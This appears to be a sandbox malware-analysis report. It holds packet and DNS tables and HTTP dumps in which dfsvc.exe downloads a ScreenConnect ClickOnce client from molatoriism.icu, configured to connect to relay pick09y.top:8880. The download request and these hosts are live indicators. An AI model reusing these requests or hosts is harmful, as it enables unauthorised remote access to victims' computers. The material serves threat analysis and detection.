                                                                                                                                                                                                Nov 7, 2024 17:56:30.590899944 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.590933084 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.659010887 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.659032106 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.659075975 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.659084082 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.659111977 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.659123898 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.709656954 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.709678888 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.709805965 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.709817886 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.709861040 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.710098028 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.710150003 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.710155964 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.710216045 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:30.710253954 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:30.710593939 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:35.052366972 CET499688880192.168.2.962.182.85.100
                                                                                                                                                                                                Nov 7, 2024 17:56:35.057403088 CET88804996862.182.85.100192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:35.057480097 CET499688880192.168.2.962.182.85.100
                                                                                                                                                                                                Nov 7, 2024 17:56:35.628695011 CET499688880192.168.2.962.182.85.100
                                                                                                                                                                                                Nov 7, 2024 17:56:35.633713961 CET88804996862.182.85.100192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:35.951627016 CET88804996862.182.85.100192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:35.995718956 CET499688880192.168.2.962.182.85.100
                                                                                                                                                                                                Nov 7, 2024 17:56:36.183480978 CET499688880192.168.2.962.182.85.100
                                                                                                                                                                                                Nov 7, 2024 17:56:36.188864946 CET88804996862.182.85.100192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:36.454466105 CET88804996862.182.85.100192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:36.495713949 CET499688880192.168.2.962.182.85.100
                                                                                                                                                                                                Nov 7, 2024 17:57:06.480331898 CET499688880192.168.2.962.182.85.100
                                                                                                                                                                                                Nov 7, 2024 17:57:06.485367060 CET88804996862.182.85.100192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:57:06.751075983 CET88804996862.182.85.100192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:57:06.792645931 CET499688880192.168.2.962.182.85.100
                                                                                                                                                                                                Nov 7, 2024 17:57:36.777245998 CET499688880192.168.2.962.182.85.100
                                                                                                                                                                                                Nov 7, 2024 17:57:36.782629013 CET88804996862.182.85.100192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:57:37.048377991 CET88804996862.182.85.100192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:57:37.089811087 CET499688880192.168.2.962.182.85.100
                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Nov 7, 2024 17:55:52.501625061 CET5132853192.168.2.91.1.1.1
                                                                                                                                                                                                Nov 7, 2024 17:55:52.561613083 CET53513281.1.1.1192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:34.118128061 CET5026753192.168.2.91.1.1.1
                                                                                                                                                                                                Nov 7, 2024 17:56:35.021833897 CET53502671.1.1.1192.168.2.9
                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                Nov 7, 2024 17:55:52.501625061 CET192.168.2.91.1.1.10x9df0Standard query (0)molatoriism.icuA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 7, 2024 17:56:34.118128061 CET192.168.2.91.1.1.10x9882Standard query (0)pick09y.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                Nov 7, 2024 17:55:47.049928904 CET1.1.1.1192.168.2.90xa569No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 7, 2024 17:55:47.049928904 CET1.1.1.1192.168.2.90xa569No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 7, 2024 17:55:47.049928904 CET1.1.1.1192.168.2.90xa569No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 7, 2024 17:55:52.561613083 CET1.1.1.1192.168.2.90x9df0No error (0)molatoriism.icu104.21.96.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 7, 2024 17:55:52.561613083 CET1.1.1.1192.168.2.90x9df0No error (0)molatoriism.icu172.67.182.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 7, 2024 17:55:58.840266943 CET1.1.1.1192.168.2.90x1e8eNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 7, 2024 17:55:58.840266943 CET1.1.1.1192.168.2.90x1e8eNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 7, 2024 17:56:01.367996931 CET1.1.1.1192.168.2.90xdf56No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 7, 2024 17:56:01.367996931 CET1.1.1.1192.168.2.90xdf56No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 7, 2024 17:56:35.021833897 CET1.1.1.1192.168.2.90x9882No error (0)pick09y.top62.182.85.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                • molatoriism.icu
                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                0192.168.2.949727104.21.96.1484437480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-07 16:55:53 UTC617OUTGET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session HTTP/1.1
                                                                                                                                                                                                Host: molatoriism.icu
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                2024-11-07 16:55:53 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Thu, 07 Nov 2024 16:55:53 GMT
                                                                                                                                                                                                Content-Type: application/x-ms-application; charset=utf-8
                                                                                                                                                                                                Content-Length: 147976
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lajaAR9PmmCZmZUouX%2FN0ryZD%2B8gMOG%2FZBrMLaWzQFyTxI8ll6MGqJeQRUTT8JSMym7V26GtlmhV1oytVUHl8i8zAPHg9yA%2FyJZC00fFXxyUC%2BsYhaOGTPnm9RF1OrGKNGU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8deeda7f18b26be9-DFW
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1140&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1208&delivery_rate=2101596&cwnd=251&unsent_bytes=0&cid=76d4e667f93b5feb&ts=714&x=0"
                                                                                                                                                                                                2024-11-07 16:55:53 UTC563INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
                                                                                                                                                                                                2024-11-07 16:55:53 UTC1369INData Raw: 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 63 6c 69 63 6b 6f 6e 63 65 2e 76 32 22 3e 0d 0a 20 20 3c 61 73 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 6e 61 6d 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 43 6c 69 65 6e 74 2e 61 70 70 6c 69 63 61 74 69 6f 6e 22 20 76 65 72 73 69 6f 6e 3d 22 32 34 2e 32 2e 31 30 2e 38 39 39 31 22 20 70 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 22 32 35 62 30 66 62 62 36 65 66 37 65 62 30 39 34 22 20 6c 61 6e 67 75 61 67 65 3d 22 6e 65 75 74 72 61 6c 22 20 70 72 6f 63 65 73 73 6f 72 41 72 63 68 69 74 65 63 74 75 72 65 3d 22 6d 73 69 6c 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 2f 3e 0d 0a 20 20 3c 64 65 73 63 72
                                                                                                                                                                                                Data Ascii: microsoft-com:clickonce.v2"> <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" /> <descr
                                                                                                                                                                                                2024-11-07 16:55:53 UTC1369INData Raw: 74 77 69 73 65 2c 20 4c 4c 43 26 71 75 6f 74 3b 2c 20 4c 3d 54 61 6d 70 61 2c 20 53 3d 46 6c 6f 72 69 64 61 2c 20 43 3d 55 53 22 20 69 73 73 75 65 72 4b 65 79 48 61 73 68 3d 22 36 38 33 37 65 30 65 62 62 36 33 62 66 38 35 66 31 31 38 36 66 62 66 65 36 31 37 62 30 38 38 38 36 35 66 34 34 65 34 32 22 20 2f 3e 3c 53 69 67 6e 61 74 75 72 65 20 49 64 3d 22 53 74 72 6f 6e 67 4e 61 6d 65 53 69 67 6e 61 74 75 72 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 22 3e 3c 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 43 61 6e 6f 6e 69 63 61 6c 69 7a 61 74 69 6f 6e 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 31 30 2f
                                                                                                                                                                                                Data Ascii: twise, LLC&quot;, L=Tampa, S=Florida, C=US" issuerKeyHash="6837e0ebb63bf85f1186fbfe617b088865f44e42" /><Signature Id="StrongNameSignature" xmlns="http://www.w3.org/2000/09/xmldsig#"><SignedInfo><CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/
                                                                                                                                                                                                2024-11-07 16:55:53 UTC1369INData Raw: 41 74 7a 41 71 44 54 51 68 30 3d 3c 2f 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 3c 4b 65 79 49 6e 66 6f 20 49 64 3d 22 53 74 72 6f 6e 67 4e 61 6d 65 4b 65 79 49 6e 66 6f 22 3e 3c 4b 65 79 56 61 6c 75 65 3e 3c 52 53 41 4b 65 79 56 61 6c 75 65 3e 3c 4d 6f 64 75 6c 75 73 3e 37 45 69 59 4a 74 43 4e 4c 47 33 69 47 7a 7a 54 5a 32 32 78 34 4f 55 4d 73 66 39 31 2f 31 5a 4f 6c 30 48 35 56 30 71 6a 5a 41 71 6f 4b 58 4b 55 6f 46 74 4e 74 6f 71 39 42 32 43 32 73 46 74 51 7a 70 4c 2f 51 71 54 6a 6b 4c 35 33 61 6b 50 70 6c 68 78 79 4c 32 73 36 54 56 79 49 43 38 78 71 59 62 51 43 62 35 45 33 30 32 73 72 66 70 75 47 42 56 68 32 75 66 71 47 44 62 79 78 5a 50 35 2f 53 31 75 64 35 48 6d 61 35 4f 41 74 77 66 43 2b 34 42 35 64 41 79 6b 7a 6f 6f 4a 7a 69 50 6a 62 43 30 67
                                                                                                                                                                                                Data Ascii: AtzAqDTQh0=</SignatureValue><KeyInfo Id="StrongNameKeyInfo"><KeyValue><RSAKeyValue><Modulus>7EiYJtCNLG3iGzzTZ22x4OUMsf91/1ZOl0H5V0qjZAqoKXKUoFtNtoq9B2C2sFtQzpL/QqTjkL53akPplhxyL2s6TVyIC8xqYbQCb5E302srfpuGBVh2ufqGDbyxZP5/S1ud5Hma5OAtwfC+4B5dAykzooJziPjbC0g
                                                                                                                                                                                                2024-11-07 16:55:53 UTC1369INData Raw: 6e 69 66 65 73 74 49 6e 66 6f 72 6d 61 74 69 6f 6e 3e 3c 61 73 3a 53 69 67 6e 65 64 42 79 20 2f 3e 3c 61 73 3a 41 75 74 68 65 6e 74 69 63 6f 64 65 50 75 62 6c 69 73 68 65 72 3e 3c 61 73 3a 58 35 30 39 53 75 62 6a 65 63 74 4e 61 6d 65 3e 43 4e 3d 22 43 6f 6e 6e 65 63 74 77 69 73 65 2c 20 4c 4c 43 22 2c 20 4f 3d 22 43 6f 6e 6e 65 63 74 77 69 73 65 2c 20 4c 4c 43 22 2c 20 4c 3d 54 61 6d 70 61 2c 20 53 3d 46 6c 6f 72 69 64 61 2c 20 43 3d 55 53 3c 2f 61 73 3a 58 35 30 39 53 75 62 6a 65 63 74 4e 61 6d 65 3e 3c 2f 61 73 3a 41 75 74 68 65 6e 74 69 63 6f 64 65 50 75 62 6c 69 73 68 65 72 3e 3c 2f 72 3a 67 72 61 6e 74 3e 3c 72 3a 69 73 73 75 65 72 3e 3c 53 69 67 6e 61 74 75 72 65 20 49 64 3d 22 41 75 74 68 65 6e 74 69 63 6f 64 65 53 69 67 6e 61 74 75 72 65 22 20 78
                                                                                                                                                                                                Data Ascii: nifestInformation><as:SignedBy /><as:AuthenticodePublisher><as:X509SubjectName>CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US</as:X509SubjectName></as:AuthenticodePublisher></r:grant><r:issuer><Signature Id="AuthenticodeSignature" x
                                                                                                                                                                                                2024-11-07 16:55:53 UTC1369INData Raw: 75 56 66 73 63 65 30 6d 64 58 6f 73 67 41 37 2b 31 36 39 73 46 67 44 66 6c 50 55 77 74 66 31 75 6f 47 45 4d 44 4d 54 31 57 4f 67 52 6e 62 6b 49 32 45 4a 6d 37 4e 2b 47 53 56 42 30 6d 45 45 71 56 32 39 76 54 64 4a 59 4b 2b 71 41 59 4b 6f 54 72 52 37 56 70 2f 46 4d 4a 4f 6d 66 53 73 59 77 72 47 4d 54 44 4b 72 72 48 64 61 56 34 71 35 4f 78 31 6a 6d 55 49 73 48 72 2f 4b 6b 67 3d 3c 2f 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 3c 4b 65 79 49 6e 66 6f 3e 3c 4b 65 79 56 61 6c 75 65 3e 3c 52 53 41 4b 65 79 56 61 6c 75 65 3e 3c 4d 6f 64 75 6c 75 73 3e 37 45 69 59 4a 74 43 4e 4c 47 33 69 47 7a 7a 54 5a 32 32 78 34 4f 55 4d 73 66 39 31 2f 31 5a 4f 6c 30 48 35 56 30 71 6a 5a 41 71 6f 4b 58 4b 55 6f 46 74 4e 74 6f 71 39 42 32 43 32 73 46 74 51 7a 70 4c 2f 51 71 54
                                                                                                                                                                                                Data Ascii: uVfsce0mdXosgA7+169sFgDflPUwtf1uoGEMDMT1WOgRnbkI2EJm7N+GSVB0mEEqV29vTdJYK+qAYKoTrR7Vp/FMJOmfSsYwrGMTDKrrHdaV4q5Ox1jmUIsHr/Kkg=</SignatureValue><KeyInfo><KeyValue><RSAKeyValue><Modulus>7EiYJtCNLG3iGzzTZ22x4OUMsf91/1ZOl0H5V0qjZAqoKXKUoFtNtoq9B2C2sFtQzpL/QqT
                                                                                                                                                                                                2024-11-07 16:55:54 UTC1369INData Raw: 38 41 4d 49 49 43 43 67 4b 43 41 67 45 41 37 45 69 59 4a 74 43 4e 4c 47 33 69 47 7a 7a 54 5a 32 32 78 34 4f 55 4d 73 66 39 31 2f 31 5a 4f 6c 30 48 35 56 30 71 6a 5a 41 71 6f 4b 58 4b 55 6f 46 74 4e 74 6f 71 39 42 32 43 32 73 46 74 51 7a 70 4c 2f 51 71 54 6a 6b 4c 35 33 61 6b 50 70 6c 68 78 79 4c 32 73 36 54 56 79 49 43 38 78 71 59 62 51 43 62 35 45 33 30 32 73 72 66 70 75 47 42 56 68 32 75 66 71 47 44 62 79 78 5a 50 35 2f 53 31 75 64 35 48 6d 61 35 4f 41 74 77 66 43 2b 34 42 35 64 41 79 6b 7a 6f 6f 4a 7a 69 50 6a 62 43 30 67 75 64 73 52 42 73 62 31 51 6b 4a 37 79 41 6a 34 66 74 69 47 57 79 5a 54 4f 42 53 4a 6d 73 6f 7a 59 6b 6c 50 6d 51 57 42 45 45 7a 45 35 64 6b 32 31 2f 45 56 77 4a 53 6c 54 61 2f 67 73 64 31 2b 65 79 42 2b 69 66 63 51 4a 55 77 4d 6c 39
                                                                                                                                                                                                Data Ascii: 8AMIICCgKCAgEA7EiYJtCNLG3iGzzTZ22x4OUMsf91/1ZOl0H5V0qjZAqoKXKUoFtNtoq9B2C2sFtQzpL/QqTjkL53akPplhxyL2s6TVyIC8xqYbQCb5E302srfpuGBVh2ufqGDbyxZP5/S1ud5Hma5OAtwfC+4B5dAykzooJziPjbC0gudsRBsb1QkJ7yAj4ftiGWyZTOBSJmsozYklPmQWBEEzE5dk21/EVwJSlTa/gsd1+eyB+ifcQJUwMl9
                                                                                                                                                                                                2024-11-07 16:55:54 UTC1369INData Raw: 79 4d 55 4e 42 4d 53 35 6a 63 6e 51 77 44 41 59 44 56 52 30 54 41 51 48 2f 42 41 49 77 41 44 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 73 46 41 41 4f 43 41 67 45 41 43 74 65 66 41 4d 39 4a 68 49 5a 4d 69 59 48 73 7a 6f 63 59 71 6f 64 57 52 2f 61 6e 52 67 6a 4a 61 4f 46 6c 61 4d 65 71 6e 58 45 65 31 7a 51 57 64 67 4f 41 5a 2f 41 54 4d 4d 6b 57 49 62 4a 36 4b 6f 69 55 78 42 43 4d 4a 6f 46 69 6f 78 38 54 2b 58 56 36 66 57 75 7a 78 76 47 62 38 6e 77 36 4b 59 6c 74 63 53 32 46 68 7a 59 6e 32 43 66 4e 5a 48 46 32 46 45 54 36 76 78 30 78 36 51 50 33 6b 52 51 38 57 30 7a 6c 35 30 52 4b 72 4c 6f 32 31 31 6d 75 75 6a 42 70 30 5a 55 69 5a 31 58 4c 78 6e 57 71 64 48 39 33 57 57 78 54 79 57 34 49 50 45 57 37 6f 6b 52 35 31 6f 52 65 36 70 38 72 4b 4c 6f 70 74 4e
                                                                                                                                                                                                Data Ascii: yMUNBMS5jcnQwDAYDVR0TAQH/BAIwADANBgkqhkiG9w0BAQsFAAOCAgEACtefAM9JhIZMiYHszocYqodWR/anRgjJaOFlaMeqnXEe1zQWdgOAZ/ATMMkWIbJ6KoiUxBCMJoFiox8T+XV6fWuzxvGb8nw6KYltcS2FhzYn2CfNZHF2FET6vx0x6QP3kRQ8W0zl50RKrLo211muujBp0ZUiZ1XLxnWqdH93WWxTyW4IPEW7okR51oRe6p8rKLoptN
                                                                                                                                                                                                2024-11-07 16:55:54 UTC1369INData Raw: 59 63 39 55 52 6e 6f 6b 43 46 34 52 53 36 68 6e 79 7a 68 47 4d 49 61 7a 4d 58 75 6b 30 6c 77 51 6a 4b 50 2b 38 62 71 48 50 4e 6c 61 4a 47 69 54 55 79 43 45 55 68 53 61 4e 34 51 76 52 52 58 58 65 67 59 45 32 58 46 66 37 4a 50 68 53 78 49 70 46 61 45 4e 64 62 35 4c 70 79 71 41 42 58 52 4e 2f 34 61 42 70 54 43 66 4d 6a 71 47 7a 4c 6d 79 73 4c 30 70 36 4d 44 44 6e 53 6c 72 7a 6d 32 71 32 41 53 34 2b 6a 57 75 66 63 78 34 64 79 74 35 42 69 67 32 4d 45 6a 52 30 65 7a 6f 51 39 75 6f 36 74 74 6d 41 61 44 47 37 64 71 5a 79 33 53 76 55 51 61 6b 68 43 42 6a 37 41 37 43 64 66 48 6d 7a 4a 61 77 76 39 71 59 46 53 4c 53 63 47 54 37 65 47 30 58 4f 42 76 36 79 62 35 6a 4e 57 79 2b 54 67 51 35 75 72 4f 6b 66 57 2b 30 2f 74 76 6b 32 45 30 58 4c 79 54 52 53 69 44 4e 69 70 6d
                                                                                                                                                                                                Data Ascii: Yc9URnokCF4RS6hnyzhGMIazMXuk0lwQjKP+8bqHPNlaJGiTUyCEUhSaN4QvRRXXegYE2XFf7JPhSxIpFaENdb5LpyqABXRN/4aBpTCfMjqGzLmysL0p6MDDnSlrzm2q2AS4+jWufcx4dyt5Big2MEjR0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJawv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tvk2E0XLyTRSiDNipm
                                                                                                                                                                                                2024-11-07 16:55:54 UTC1369INData Raw: 6b 34 56 66 63 33 69 6f 73 4a 6f 63 73 4c 36 54 45 61 2f 79 34 5a 58 44 6c 78 34 62 36 63 70 77 6f 47 31 69 5a 6e 74 35 4c 6d 54 6c 2f 65 65 71 78 4a 7a 79 36 6b 64 4a 4b 74 32 7a 79 6b 6e 49 59 66 34 38 46 57 47 79 73 6a 2f 34 2b 31 36 6f 68 37 63 47 76 6d 6f 4c 72 39 4f 6a 39 46 70 73 54 6f 46 70 46 53 69 30 48 41 53 49 52 4c 6c 6b 32 72 52 45 44 6a 6a 66 41 56 4b 4d 37 74 38 52 68 57 42 79 6f 76 45 4d 51 4d 43 47 51 38 4d 34 2b 75 4b 49 77 38 79 34 2b 49 43 77 32 2f 4f 2f 54 4f 48 6e 75 4f 37 37 58 72 79 37 66 77 64 78 50 6d 35 79 67 2f 72 42 4b 75 70 53 38 69 62 45 48 35 67 6c 77 56 5a 73 78 73 44 73 72 46 68 73 50 32 4a 6a 4d 4d 42 30 75 67 30 77 63 43 61 6d 70 41 4d 45 68 4c 4e 4b 68 52 49 4c 75 74 47 34 55 49 34 6c 6b 4e 62 63 6f 46 55 43 76 71 53
                                                                                                                                                                                                Data Ascii: k4Vfc3iosJocsL6TEa/y4ZXDlx4b6cpwoG1iZnt5LmTl/eeqxJzy6kdJKt2zyknIYf48FWGysj/4+16oh7cGvmoLr9Oj9FpsToFpFSi0HASIRLlk2rREDjjfAVKM7t8RhWByovEMQMCGQ8M4+uKIw8y4+ICw2/O/TOHnuO77Xry7fwdxPm5yg/rBKupS8ibEH5glwVZsxsDsrFhsP2JjMMB0ug0wcCampAMEhLNKhRILutG4UI4lkNbcoFUCvqS


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                1192.168.2.949748104.21.96.1484437480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-07 16:55:57 UTC97OUTGET /Bin/ScreenConnect.Client.manifest HTTP/1.1
                                                                                                                                                                                                Host: molatoriism.icu
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                2024-11-07 16:55:58 UTC771INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Thu, 07 Nov 2024 16:55:58 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8zptcaOBxKrlPY79Dwawm11JaPxKnfCcwGgM4siitz4qz1mpSunLGPdCAhWmd9AN0RQWMgWlA5lqa%2BZGTlMzOW%2FqjiD%2B4TF1jQn6uCq7RcKd28uhTrHrKgoBx5ziCKnBcQE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8deeda9b3d2e2e6c-DFW
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1180&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=712&delivery_rate=2475213&cwnd=233&unsent_bytes=0&cid=d7689845b8bb123a&ts=709&x=0"
                                                                                                                                                                                                2024-11-07 16:55:58 UTC598INData Raw: 34 30 30 30 0d 0a ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e
